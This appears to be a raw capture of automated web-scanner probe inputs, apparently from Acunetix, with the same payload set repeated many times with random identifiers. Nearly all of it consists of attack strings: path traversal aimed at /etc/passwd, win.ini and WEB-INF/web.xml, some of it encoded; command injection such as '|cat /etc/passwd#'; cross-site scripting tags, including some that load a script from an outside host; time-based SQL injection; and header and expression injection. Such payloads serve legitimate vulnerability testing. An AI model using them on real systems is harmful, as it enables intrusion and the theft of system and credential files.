..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

http://www.acunetix.tst

1

comments/.

Joph01VW'

'"

"&dir&"

1

1_4HfjY <ScRiPt >prompt(936275)</ScRiPt>

1'"()&%<ScRiPt >prompt(948575)</ScRiPt>

<!--

file:///etc/passwd

1

hqcnfKq7')

1

1

1

|dir

1

'"()&%<ScRiPt >prompt(976048)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

pZEtUW04'))

'|dir

1_987273

1

1

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5749\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5749

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux10647\xc0\xbez1\xc0\xbcz2a\x90bcxuca10647

................windowswin.ini

1

1<ScRiPt >prompt(929853)</ScRiPt>

1

1

1<script>prompt(983025)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(989534)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920830></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9082697*9925038)

1<ScRiPt >prompt(957543)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9082697*9925038)+'

1<video><source onerror="javascript:prompt(911945)">

1

1

&cat /etc/passwd&

1

"+response.write(9082697*9925038)+"

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949056)"></g></svg>

../../../../../../../../../../etc/passwd

1

1

'&cat /etc/passwd&'

1

1

1<div style=width:expression(prompt(943749))>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd.jpg

1<iframe src='data:text/html

1

1

1

1

cat /etc/passwd

1<body onload=prompt(937540)>

1

${99593+99373}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945679)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

|cat /etc/passwd#

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(935075)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n987242=v984181

1

-1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(954709)>

'|'ld

1

!(()&&!|*|*|

-1)

'"()

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

"|"ld

1<ScRiPt%20>prompt(982597)</sCripT>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

1

/etc/passwd

'

1&lt

testasp.vulnweb.com

1

1

TSKO7Lwh'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

"

\xf6<img acu onmouseover=prompt(907654) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hitJLBtweaSUT.bxss.me/

mLjeaHor')

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(924235)>

"

1

1

1

acunetix_wvs_invalid_filename

2DlbkAwQ'))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

'&dir&'

-1)

file:///etc/passwd

1

comments

http://www.acunetix.tst

1_sTrMF <ScRiPt >prompt(949728)</ScRiPt>

1

-1))

"&dir&"

1

1

comments/.

'"

1'"()&%<ScRiPt >prompt(955743)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

|dir

fhuNEZjX'

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(994916)</ScRiPt>

<!--

1

1

1

1

1

'|dir

6SRVl3Xf')

WEB-INF\web.xml

1

1_991993

1

"|dir

8ctQQAO7'))

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu4498\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4498

1

1

1

acux1352\xc0\xbez1\xc0\xbcz2a\x90bcxuca1352

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(994337)</ScRiPt>

1

1

1

1

1

1<script>prompt(985069)</script>

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(984569)</ScRiPt>

1

1

response.write(9895180*9564588)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917448></ScRiPt>

1

1

WEB-INF\web.xml

1

1<ScRiPt >prompt(917000)</ScRiPt>

1

'+response.write(9895180*9564588)+'

1

1

1

1<video><source onerror="javascript:prompt(980413)">

"+response.write(9895180*9564588)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997461)"></g></svg>

1

1

1

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(989567))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1<body onload=prompt(934003)>

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

${99178+99191}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978171)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(958034)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1&n990131=v979729

|cat /etc/passwd#

)

1<img/src=">" onerror=alert(946677)>

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

'"()

1<ScRiPt%20>prompt(939596)</sCripT>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

^(#$!@#$)(()))******

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

fyAzj1Vq'

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

"|"ld

\xf6<img acu onmouseover=prompt(920341) //\xf6>

MKV51KYR')

1

1

1

1

1

/etc/passwd

1<input autofocus onfocus=prompt(929852)>

${@print(md5(acunetix_wvs_security_test))}

1

waVXu4vj'))

1

1

1

http://hitGfYlLihjff.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

-1

'

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

1

-1)

1

"

1_cbCG1 <ScRiPt >prompt(978484)</ScRiPt>

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

comments

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

0FuqzKMK'

comments/.

1

'"

'&dir&'

1

1

1

<!--

1

1'"()&%<ScRiPt >prompt(959988)</ScRiPt>

1

x6bJsYfr')

1

1

1

file:///etc/passwd

"&dir&"

RdlKKtSP'))

'"()&%<ScRiPt >prompt(935734)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_905798

1

|dir

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

'|dir

../../../../../../../../../../windows/win.ini

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

acu5635\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5635

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

acux8231\xc0\xbez1\xc0\xbcz2a\x90bcxuca8231

1

response.write(9167235*9266965)

1<ScRiPt >prompt(914936)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(990940)</script>

1

'+response.write(9167235*9266965)+'

1

"+response.write(9167235*9266965)+"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<ScRiPt >prompt(911592)</ScRiPt>

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959955></ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(951198)</ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(985532)">

../../../../../../../../../../etc/passwd.jpg

1

${99878+99176}

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980672)"></g></svg>

1

1

`cat /etc/passwd`

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n909567=v975357

1<div style=width:expression(prompt(929741))>

-1)

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

)

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<iframe src='data:text/html

1

1

1

'|'ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

8z81T0tN'

1

1

1<body onload=prompt(965801)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

^(#$!@#$)(()))******

"|"ld

'"()

1kuAza5D')

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908633)>

1

'

/etc/passwd

1

1

gHzvFZkz'))

1

1

1

1<img src=xyz OnErRor=prompt(972178)>

"

1

1

1

'

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img/src=">" onerror=alert(947118)>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<ScRiPt%20>prompt(946532)</sCripT>

1

http://hitueJwwmjsUl.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1&lt

1

1

4HgnNTgV'

1

&dir

1

comments

1

http://www.acunetix.tst

'"

0w0b3lAx')

\xf6<img acu onmouseover=prompt(994163) //\xf6>

1

1'"()&%<ScRiPt >prompt(967168)</ScRiPt>

comments

1

'&dir&'

evw0RzyR'))

<!--

file:///etc/passwd

1

comments/.

'"()&%<ScRiPt >prompt(962429)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1<input autofocus onfocus=prompt(956990)>

"&dir&"

1

1

1

1_939978

<a href='http://www.acunetix.com'>website security</a>

WEB-INF/web.xml

|dir

1

1

[url=http://www.acunetix.com]website security[/url]

1

'|dir

1

WEB-INF\web.xml

1_7wc4f <ScRiPt >prompt(930417)</ScRiPt>

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu2481\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2481

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2779\xc0\xbez1\xc0\xbcz2a\x90bcxuca2779

1

1

1

1<ScRiPt >prompt(943565)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(959254)</script>

1

................windowswin.ini

1<ScRiPt >prompt(918927)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971034></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(937262)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(973138)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967924)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(955671))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

response.write(9976556*9288306)

1

1

1

1<body onload=prompt(907317)>

&cat /etc/passwd&

'+response.write(9976556*9288306)+'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932534)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(908960)>

1

"+response.write(9976556*9288306)+"

1

1

../../../../../../../../../../etc/passwd

1<img/src=">" onerror=alert(939780)>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<ScRiPt%20>prompt(966919)</sCripT>

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1&lt

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

\xf6<img acu onmouseover=prompt(941081) //\xf6>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

${99022+99483}

1

|cat /etc/passwd#

1

1<input autofocus onfocus=prompt(969943)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n957285=v931158

'|'ld

<a href='http://www.acunetix.com'>website security</a>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

)

1

"|"ld

[url=http://www.acunetix.com]website security[/url]

1

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1_wceMl <ScRiPt >prompt(995878)</ScRiPt>

1

1

0FBHaNOf'

^(#$!@#$)(()))******

'

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

ZArSFYN4'

1

1

1

/etc/passwd

1

X5frZtiz'

1

"

'

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

GiiF0aMY')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

k16iMasC'))

1

1

&dir

1

1

${@print(md5(acunetix_wvs_security_test))}

http://hitiGuByDeOSM.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1

acunetix_wvs_invalid_filename

1

'&dir&'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

"&dir&"

1

-1)

1

comments

'"

1'"()&%<ScRiPt >prompt(926338)</ScRiPt>

1

http://www.acunetix.tst

-1))

file:///etc/passwd

|dir

1

1

<!--

'"()&%<ScRiPt >prompt(910038)</ScRiPt>

comments/.

IP3hCwHQ'

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1_947435

1

1

7DrYMrzs')

"|dir

1

1

WEB-INF/web.xml

5BMSiRXG'))

1

1

1

1

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu7898\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7898

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux5861\xc0\xbez1\xc0\xbcz2a\x90bcxuca5861

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(972246)</ScRiPt>

1

1<script>prompt(978975)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(904697)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901489></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(922020)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(953325)">

1

WEB-INF/web.xml

1

1

1

response.write(9559700*9341434)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902015)"></g></svg>

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1

1<div style=width:expression(prompt(912065))>

'+response.write(9559700*9341434)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

"+response.write(9559700*9341434)+"

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1

1

1

1<body onload=prompt(981089)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

${100270+99468}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946550)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=xyz OnErRor=prompt(923067)>

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1&n949439=v991429

)

1<img/src=">" onerror=alert(939740)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1

!(()&&!|*|*|

'|'ld

1

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(992889)</sCripT>

testasp.vulnweb.com

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

^(#$!@#$)(()))******

1

-1))

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

6e70PI59'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(901876) //\xf6>

1

"

1

1

1

'

1

4SmlJPOn')

${@print(md5(acunetix_wvs_security_test))}

1

http://hitJUIOou2CaJ.bxss.me/

/etc/passwd

1<input autofocus onfocus=prompt(983518)>

"

V6Ft1NeF'))

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

-1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

comments

1

1

1

-1)

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

1_cudAd <ScRiPt >prompt(948859)</ScRiPt>

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

'"

1

-1))

comments/.

1

1

1'"()&%<ScRiPt >prompt(945646)</ScRiPt>

1

"&dir&"

tPIC1Jap'

<!--

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"()&%<ScRiPt >prompt(954606)</ScRiPt>

1

1

1

1

|dir

EtvtU1xy')

1

1

1

1_970409

file:///etc/passwd

1

P8BszFOC'))

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

acu8221\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8221

../../../../../../../../../../boot.ini

acux8496\xc0\xbez1\xc0\xbcz2a\x90bcxuca8496

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(981816)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(955691)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(995976)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962486></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

response.write(9090545*9764964)

1<ScRiPt >prompt(977610)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'+response.write(9090545*9764964)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(954458)">

1

1

"+response.write(9090545*9764964)+"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958417)"></g></svg>

1

&cat /etc/passwd&

1

1

1

1<div style=width:expression(prompt(982102))>

1

1

'&cat /etc/passwd&'

1

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

"&cat /etc/passwd&"

1

1

1<body onload=prompt(976100)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1

1

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902147)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(945651)>

1

1

${100005+99967}

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<img/src=">" onerror=alert(943396)>

1

|cat /etc/passwd#

SomeCustomInjectedHeader:injected_by_wvs

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n933162=v956775

'|'ld

1

1<ScRiPt%20>prompt(944415)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

)

f6dynqpl'

1

"|"ld

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

amPCqPg2')

1

'"()

1

\xf6<img acu onmouseover=prompt(915193) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

rmxqMvuA'))

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1<input autofocus onfocus=prompt(966240)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

-1

1

<a href='http://www.acunetix.com'>website security</a>

1

'

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

